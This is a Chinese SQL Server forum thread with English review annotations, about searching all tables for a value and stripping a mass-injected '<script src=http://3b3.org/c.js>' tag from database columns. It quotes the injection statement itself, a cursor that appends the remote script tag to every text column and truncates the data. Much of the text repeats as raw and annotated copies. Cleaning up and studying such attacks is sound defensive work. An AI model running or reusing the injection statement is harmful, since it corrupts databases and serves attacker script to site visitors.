--查询数据 CREATE PROC sp_ValueSearch @value sql_variant, --要搜索的数据 @precision bit=1 --1=仅根据sql_variant中的数据类型查找对应类型的数据列.<>1,查询兼容的所有列,字符数据使用like匹配 AS SET NOCOUNT ON IF @value IS NULL RETURN--数据类型处理 SELECT xtype INTO #t FROM systypes WHERE name=SQL_VARIANT_PROPERTY(@value,N'BaseType')--扩展数据类型及查询处理语句 DECLARE @sql nvarchar(4000),@sql1 nvarchar(4000) IF @precision=1 SET @sql=CASE SQL_VARIANT_PROPERTY(@value,N'BaseType') WHEN N'text' THEN N' LIKE N''%''+CAST(@value as varchar(8000))+''%''' WHEN N'ntext' THEN N' LIKE ''%''+CAST(@value as nvarchar(4000))+''%''' ELSE N'=@value' END ELSE BEGIN SET @sql=CAST(SQL_VARIANT_PROPERTY(@value,N'BaseType') as sysname) IF @sql LIKE N'%char' or @sql LIKE N'%text' BEGIN INSERT #t SELECT xtype FROM systypes WHERE name LIKE N'%char' or name LIKE N'%text' SELECT @sql=N' LIKE N''%''+CAST(@value as ' +CASE WHEN LEFT(@sql,1)=N'n' THEN ' nvarchar(4000)' ELSE 'varchar(8000)' END +N')+N''%''' END ELSE IF @sql LIKE N'%datetime' BEGIN INSERT #t SELECT xtype FROM systypes WHERE name LIKE N'%datetime' SET @sql=N'=@value' END ELSE IF @sql LIKE N'%int' OR @sql LIKE N'%money' OR @sql IN(N'real',N'float',N'decimal',N'numeric') BEGIN INSERT #t SELECT xtype FROM systypes WHERE name LIKE N'%int' OR name LIKE N'%money' OR name IN(N'real',N'float',N'decimal') SET @sql=N'=@value' END ELSE SET @sql=N'=@value' END --保存结果的临时表 CREATE TABLE #(TableName sysname,FieldName sysname,Type sysname,SQL nvarchar(4000))DECLARE tb CURSOR LOCAL FOR SELECT N'SELECT * FROM ' +QUOTENAME(USER_NAME(o.uid)) +N'.'+QUOTENAME(o.name) +N' WHERE '+QUOTENAME(c.name) +@sql, N'INSERT # VALUES(N'+QUOTENAME(o.name,N'''') +N',N'+QUOTENAME(c.name,N'''') +N',N'+QUOTENAME(QUOTENAME(t.name)+CASE WHEN t.name IN (N'decimal',N'numeric') THEN N'('+CAST(c.prec as varchar)+N','+CAST(c.scale as varchar)+N')' WHEN t.name=N'float' OR t.name like N'%char' OR t.name like N'%binary' THEN N'('+CAST(c.prec as varchar)+N')' ELSE N'' END,N'''') +N',@sql)' FROM sysobjects o,syscolumns c,systypes t,#t tt WHERE 
o.id=c.id AND c.xusertype=t.xusertype AND t.xtype=tt.xtype AND OBJECTPROPERTY(o.id,N'IsUserTable')=1OPEN tb FETCH tb INTO @sql,@sql1 WHILE @@FETCH_STATUS=0 BEGIN SET @sql1=N'IF EXISTS('+@sql+N') '+@sql1 EXEC sp_executesql @sql1,N'@value sql_variant,@sql nvarchar(4000)',@value,@sql FETCH tb INTO @sql,@sql1 END CLOSE tb DEALLOCATE tb SELECT * FROM #exec sp_ValueSearch '要搜索的值',1 --1或不输入(即默认值1)精确匹配 exec sp_ValueSearch '要搜索的值',0 --不等于1,模糊匹配
写一个脚本可以解决了 declare @s varchar(8000) declare @tb varchar(20) set @tb='tbEmployee' set @s='' select @s=@s+name+'=replace('+name+','''',''ABCDE''),' from syscolumns where id=object_id(@tb) and name<>'id' order by colid set @s='select ' +left(@s,len(@s)-1) + ' from ' +@tb print @S
同样的道理,如果是update语句,那么就把上面的select 语句就好了declare @s varchar(8000) declare @tb varchar(20) set @tb='tbEmployee' set @s='' select @s=@s+name+'=replace('+name+','''',''ABCDE''),' from syscolumns where id=object_id(@tb) and name<>'id' order by colid set @s='update '+@tb +' set ' +left(@s,len(@s)-1) print @S
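-- Removes the literal 'abcde' from the character columns of table "tab" in one UPDATE.
-- Changes from the posted one-liner: column names go through QUOTENAME, only
-- char/varchar/nchar/nvarchar columns of a user table are included (REPLACE is not valid on
-- numeric, date or text/ntext columns), and nothing runs when no column qualifies.
-- Back up the table first; REPLACE cannot be undone.
declare @s varchar(5000)
select @s=isnull(@s+',','')+quotename(b.name)+'=replace('+quotename(b.name)+',''abcde'','''')'
from sysobjects a
inner join syscolumns b on b.id=a.id
inner join systypes t on t.xusertype=b.xtype   -- base type of the column, also for user-defined types
where a.name='tab'
  and objectproperty(a.id,N'IsUserTable')=1
  and t.name in ('char','varchar','nchar','nvarchar')
if @s is not null
begin
    print 'update tab set '+@s   -- keep a record of the statement that was executed
    exec('update tab set '+@s)
end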
DECLARE hCForEach CURSOR GLOBAL FOR SELECT N'update '+QUOTENAME(o.name) +N' set '+ QUOTENAME(c.name) + N' = replace(' + QUOTENAME(c.name) + ',''<script src=http://3b3.org/c.js></script>'','''')' FROM sysobjects o,syscolumns c,systypes t WHERE o.id=c.id AND OBJECTPROPERTY(o.id,N'IsUserTable')=1 AND c.xusertype=t.xusertype AND t.name IN('varchar','nvarchar','char','nchar','ntext') EXEC sp_MSforeach_Worker @command1=N'?' --检查清理干净否? select Reply from gbook其中“<script src=http://3b3.org/c.js></script>”为需要更换的木马语句,可以根据需要替换。update gbook set Reply=replace(cast(Reply as varchar(8000)),'<script src=http://3b3.org/c.js></script>','') 你把'<script src=http://3b3.org/c.js></script>'改成'ABCDE'就应该行。信息来源:http://www.tt17ba.com/blogview.asp?logID=107
declare @s varchar(5000) select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')' from sysobjects a,syscolumns b where a.id=b.id and a.name='tab' exec('update tab set '+@s)这个不可以吗?把tab换成你的表名
declare @s varchar(5000) select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')' from sysobjects a,syscolumns b where a.id=b.id and a.name='tab' exec('update tab set '+@s)我的是SQL2005. 消息102,级别15,状态1,第3次 '@s'附近有语法错误
已经把tab 换成自己的数据库名。
-- NOTE(review): this is not a cleanup script. The UPDATE it builds sets each column to its own
-- value with the <script> tag appended, i.e. it adds the tag to every varchar/nvarchar/text/ntext
-- column (xtype 167, 231, 35, 99) of every user table. It is presumably quoted here as the
-- statement that was injected; do not run it.
-- Forensic points visible in the statement:
--   * convert(varchar, col) has no length, so the value is cut to 30 characters before the tag
--     is appended. REPLACE can strip the tag but cannot bring back the truncated text; affected
--     rows have to come from a backup.
--   * As printed, the appended tag has a space before </script>, while the REPLACE patterns
--     elsewhere on this page have none. Compare the exact bytes in an affected row before
--     relying on a REPLACE pattern.
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://3b3.org/c.js> </script>''') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
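-- Generates one UPDATE per character column of every user table. Run the query, review the
-- output, then copy and execute the statements you want.
-- Changes from the posted version: 'abcde' is emitted as a quoted string (it was emitted bare,
-- which the generated UPDATE would read as a column name), table and column names go through
-- QUOTENAME, and only char/varchar/nchar/nvarchar columns are listed.
select 'update ' + quotename(user_name(b.uid)) + '.' + quotename(b.name)
     + ' set ' + quotename(a.name)
     + ' = replace(' + quotename(a.name) + ', ''abcde'', '''')'
from syscolumns a
inner join sysobjects b on a.id = b.id and b.type = 'u'
inner join systypes t on t.xusertype = a.xtype   -- base type of the column
where t.name in ('char','varchar','nchar','nvarchar')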
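-- sp_ValueSearch: looks for @value in every column of every user table in the current
-- database and returns one row per (table, column) that contains it.
--
-- Review notes:
--   * Object names are inserted into the dynamic SQL through QUOTENAME and the search value is
--     passed to sp_executesql as a parameter, so neither is spliced in as raw text.
--   * In fuzzy mode the value is placed between two % signs; %, _ and [ inside @value are
--     treated as LIKE wildcards.
--   * Every candidate column is scanned, which is expensive on large databases, and the
--     result reveals where a value is stored. Limit who may execute the procedure.
--   * Fixed here: statements that had been run together (")DECLARE", "=1OPEN", "#exec"),
--     'numeric' missing from the numeric type family, and a type listed twice in #t, which
--     returned every hit twice.
CREATE PROC sp_ValueSearch
    @value sql_variant,   -- value to search for
    @precision bit = 1    -- 1 = only columns whose type is the base type of @value, compared with "=";
                          -- anything else = all compatible columns, character data matched with LIKE
AS
SET NOCOUNT ON
IF @value IS NULL RETURN

-- Candidate column types: start with the base type of the supplied value.
SELECT xtype INTO #t FROM systypes
WHERE name = SQL_VARIANT_PROPERTY(@value, N'BaseType')

-- @sql first holds the predicate appended after each column name; later it is reused for the
-- per-column SELECT. @sql1 holds the per-column INSERT.
DECLARE @sql nvarchar(4000), @sql1 nvarchar(4000)
IF @precision = 1
    -- NOTE(review): sql_variant cannot store text or ntext values, so the first two branches
    -- look unreachable; confirm before relying on them.
    SET @sql = CASE SQL_VARIANT_PROPERTY(@value, N'BaseType')
        WHEN N'text' THEN N' LIKE N''%''+CAST(@value as varchar(8000))+''%'''
        WHEN N'ntext' THEN N' LIKE ''%''+CAST(@value as nvarchar(4000))+''%'''
        ELSE N'=@value' END
ELSE
BEGIN
    SET @sql = CAST(SQL_VARIANT_PROPERTY(@value, N'BaseType') as sysname)
    IF @sql LIKE N'%char' or @sql LIKE N'%text'
    BEGIN
        -- Character value: search every character and text column with LIKE.
        INSERT #t SELECT xtype FROM systypes
        WHERE name LIKE N'%char' or name LIKE N'%text'
        SELECT @sql = N' LIKE N''%''+CAST(@value as '
            + CASE
                WHEN LEFT(@sql, 1) = N'n' THEN ' nvarchar(4000)'
                ELSE 'varchar(8000)' END
            + N')+N''%'''
    END
    ELSE IF @sql LIKE N'%datetime'
    BEGIN
        -- Date value: search datetime and smalldatetime columns.
        INSERT #t SELECT xtype FROM systypes
        WHERE name LIKE N'%datetime'
        SET @sql = N'=@value'
    END
    ELSE IF @sql LIKE N'%int'
        OR @sql LIKE N'%money'
        OR @sql IN (N'real', N'float', N'decimal', N'numeric')
    BEGIN
        -- Numeric value: search the whole numeric family. 'numeric' was absent from this
        -- list although the condition above accepts it.
        INSERT #t SELECT xtype FROM systypes
        WHERE name LIKE N'%int'
            OR name LIKE N'%money'
            OR name IN (N'real', N'float', N'decimal', N'numeric')
        SET @sql = N'=@value'
    END
    ELSE
        SET @sql = N'=@value'
END

-- Temporary table that collects the hits.
CREATE TABLE #(TableName sysname, FieldName sysname, Type sysname, SQL nvarchar(4000))

-- One row per candidate column: the SELECT that tests the column and the INSERT that records it.
DECLARE tb CURSOR LOCAL
FOR
SELECT N'SELECT * FROM '
        + QUOTENAME(USER_NAME(o.uid))
        + N'.' + QUOTENAME(o.name)
        + N' WHERE ' + QUOTENAME(c.name)
        + @sql,
    N'INSERT # VALUES(N' + QUOTENAME(o.name, N'''')
        + N',N' + QUOTENAME(c.name, N'''')
        + N',N' + QUOTENAME(QUOTENAME(t.name) + CASE
            WHEN t.name IN (N'decimal', N'numeric')
                THEN N'(' + CAST(c.prec as varchar) + N',' + CAST(c.scale as varchar) + N')'
            WHEN t.name = N'float'
                OR t.name like N'%char'
                OR t.name like N'%binary'
                THEN N'(' + CAST(c.prec as varchar) + N')'
            ELSE N'' END, N'''')
        + N',@sql)'
FROM sysobjects o
INNER JOIN syscolumns c ON c.id = o.id
INNER JOIN systypes t ON t.xusertype = c.xusertype
-- DISTINCT: the base type is inserted into #t a second time by the family INSERTs above.
INNER JOIN (SELECT DISTINCT xtype FROM #t) tt ON tt.xtype = t.xtype
WHERE OBJECTPROPERTY(o.id, N'IsUserTable') = 1

OPEN tb
FETCH tb INTO @sql, @sql1
WHILE @@FETCH_STATUS = 0
BEGIN
    -- Record the column only if the test SELECT finds at least one row.
    SET @sql1 = N'IF EXISTS(' + @sql + N') ' + @sql1
    EXEC sp_executesql @sql1, N'@value sql_variant,@sql nvarchar(4000)', @value, @sql
    FETCH tb INTO @sql, @sql1
END
CLOSE tb
DEALLOCATE tb

SELECT TableName, FieldName, Type, SQL FROM #
GO
-- The batch separator above keeps the sample calls out of the procedure body; without it
-- the procedure would call itself.

exec sp_ValueSearch '要搜索的值',1 -- 1 or omitted (the default): exact match
exec sp_ValueSearch '要搜索的值',0 -- any other value: fuzzy match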
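-- Builds and prints (does not execute) a SELECT that previews REPLACE() on the character
-- columns of one table, so the effect can be inspected before any UPDATE is run.
-- Changes from the posted version: names go through QUOTENAME, only
-- char/varchar/nchar/nvarchar columns are included, an empty column list no longer reaches
-- LEFT(), and the variable is printed under the name it was declared with.
-- NOTE(review): as posted the search string in REPLACE is empty; fill in the text to be
-- replaced before using the output.
declare @s varchar(8000)
declare @tb sysname              -- was varchar(20); sysname holds any unqualified table name
set @tb='tbEmployee'
set @s=''
select @s=@s+quotename(c.name)+'=replace('+quotename(c.name)+','''',''ABCDE''),'
from syscolumns c
inner join systypes t on t.xusertype=c.xtype   -- base type of the column
where c.id=object_id(@tb) and c.name<>'id'
  and t.name in ('char','varchar','nchar','nvarchar')
order by c.colid
if @s=''
    print 'no character columns found'
else
begin
    -- drop the trailing comma left by the concatenation
    set @s='select '+left(@s,len(@s)-1)+' from '+quotename(@tb)
    print @s
end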
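-- Builds and prints (does not execute) an UPDATE that applies REPLACE() to the character
-- columns of one table. Review the printed statement and take a backup before running it.
-- Changes from the posted version: the declaration of @s is restored, names go through
-- QUOTENAME, only char/varchar/nchar/nvarchar columns are included, and an empty column list
-- no longer reaches LEFT().
-- NOTE(review): as posted the search string in REPLACE is empty; fill in the text to be
-- replaced before using the output.
declare @s varchar(8000)
declare @tb sysname              -- was varchar(20); sysname holds any unqualified table name
set @tb='tbEmployee'
set @s=''
select @s=@s+quotename(c.name)+'=replace('+quotename(c.name)+','''',''ABCDE''),'
from syscolumns c
inner join systypes t on t.xusertype=c.xtype   -- base type of the column
where c.id=object_id(@tb) and c.name<>'id'
  and t.name in ('char','varchar','nchar','nvarchar')
order by c.colid
if @s=''
    print 'no character columns found'
else
begin
    -- drop the trailing comma left by the concatenation
    set @s='update '+quotename(@tb)+' set '+left(@s,len(@s)-1)
    print @s
end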
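-- Removes the literal 'abcde' from the character columns of table "tab" in one UPDATE.
-- Changes from the posted version: the declaration of @s is restored, column names go through
-- QUOTENAME, only char/varchar/nchar/nvarchar columns of a user table are included (REPLACE
-- is not valid on numeric, date or text/ntext columns), and nothing runs when no column
-- qualifies. Back up the table first; REPLACE cannot be undone.
declare @s varchar(5000)
select @s=isnull(@s+',','')+quotename(b.name)+'=replace('+quotename(b.name)+',''abcde'','''')'
from sysobjects a
inner join syscolumns b on b.id=a.id
inner join systypes t on t.xusertype=b.xtype   -- base type of the column, also for user-defined types
where a.name='tab'
  and objectproperty(a.id,N'IsUserTable')=1
  and t.name in ('char','varchar','nchar','nvarchar')
if @s is not null
begin
    print 'update tab set '+@s   -- keep a record of the statement that was executed
    exec('update tab set '+@s)
end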
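-- Cleanup: strips the injected <script> tag from every character column of every user table.
-- The cursor yields one UPDATE per column; sp_MSforeach_Worker then executes each of them.
-- Changes from the posted version:
--   * the DECLARE line is restored and the EXEC is on its own line;
--   * tables are schema-qualified;
--   * each UPDATE touches only rows that contain the tag, which keeps the change set and the
--     transaction log small and makes the affected row counts meaningful;
--   * ntext columns are cast to nvarchar(4000) because REPLACE does not accept ntext, and
--     values longer than that are skipped instead of being truncated. Handle them separately.
-- Take a backup first, and compare the pattern with the exact bytes stored in an affected row.
DECLARE hCForEach CURSOR GLOBAL
FOR
SELECT N'update ' + QUOTENAME(USER_NAME(o.uid)) + N'.' + QUOTENAME(o.name)
     + N' set ' + QUOTENAME(c.name) + N' = replace('
     + CASE WHEN t.name = 'ntext'
            THEN N'cast(' + QUOTENAME(c.name) + N' as nvarchar(4000))'
            ELSE QUOTENAME(c.name) END
     + ',''<script src=http://3b3.org/c.js></script>'','''')'
     + N' where ' + QUOTENAME(c.name) + N' like ''%<script src=http://3b3.org/c.js></script>%'''
     + CASE WHEN t.name = 'ntext'
            THEN N' and datalength(' + QUOTENAME(c.name) + N') <= 8000'   -- 4000 characters
            ELSE N'' END
FROM sysobjects o
INNER JOIN syscolumns c ON c.id = o.id
INNER JOIN systypes t ON t.xusertype = c.xusertype
WHERE OBJECTPROPERTY(o.id, N'IsUserTable') = 1
  AND t.name IN ('varchar', 'nvarchar', 'char', 'nchar', 'ntext')

-- NOTE(review): sp_MSforeach_Worker is an undocumented system procedure; the page relies on it
-- to run each statement produced by the global cursor hCForEach. Confirm it behaves this way
-- on the server version in use.
EXEC sp_MSforeach_Worker @command1=N'?'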
--检查清理干净否?
select Reply from gbook
其中“<script src=http://3b3.org/c.js></script>”为需要更换的木马语句,可以根据需要替换。
update gbook set Reply=replace(cast(Reply as varchar(8000)),'<script src=http://3b3.org/c.js></script>','')
注意:cast(Reply as varchar(8000)) 会截断超过 8000 字节的内容;如果 Reply 是 ntext,还会丢失当前代码页无法表示的字符。执行前请先备份。
你把'<script src=http://3b3.org/c.js></script>'改成'ABCDE'就应该行。信息来源:http://www.tt17ba.com/blogview.asp?logID=107
select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')'
from sysobjects a,syscolumns b where a.id=b.id and a.name='tab'
exec('update tab set '+@s)
这个不可以吗?把tab换成你的表名
select @s=isnull(@s+',','')+''+b.name+'=replace('+b.name+',''abcde'','''')'
from sysobjects a,syscolumns b where a.id=b.id and a.name='tab'
exec('update tab set '+@s)
我的是SQL2005.
消息102,级别15,状态1,第3次
'@s'附近有语法错误
-- NOTE(review): this is not a cleanup script. The UPDATE built in the loop sets each column to
-- its own value with the <script> tag appended. It is presumably quoted here as the statement
-- that was injected; do not run it.
-- @T and @C are used but not declared in the lines shown here.
DECLARE Table_Cursor CURSOR FOR
-- Every column of every user table (xtype='u') whose type is ntext (99), text (35),
-- nvarchar (231) or varchar (167).
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
-- convert(varchar, col) has no length, so the value is cut to 30 characters before the tag is
-- appended. REPLACE can strip the tag but cannot bring back the truncated text; affected rows
-- have to come from a backup.
-- As printed, the tag has a space before </script>, while the REPLACE patterns elsewhere on
-- this page have none. Compare the exact bytes in an affected row before relying on a pattern.
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://3b3.org/c.js> </script>''')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor
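-- Generates one UPDATE per character column of every user table. Run the query, review the
-- output, then copy and execute the statements you want.
-- Changes from the posted version: 'abcde' is emitted as a quoted string (it was emitted bare,
-- which the generated UPDATE would read as a column name), table and column names go through
-- QUOTENAME, and only char/varchar/nchar/nvarchar columns are listed.
select 'update ' + quotename(user_name(b.uid)) + '.' + quotename(b.name)
     + ' set ' + quotename(a.name)
     + ' = replace(' + quotename(a.name) + ', ''abcde'', '''')'
from syscolumns a
inner join sysobjects b on a.id = b.id and b.type = 'u'
inner join systypes t on t.xusertype = a.xtype   -- base type of the column
where t.name in ('char','varchar','nchar','nvarchar')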
http://topic.csdn.net/u/20090427/01/2a55eef7-0d8a-47db-9c73-8ef6da4cb8d6.html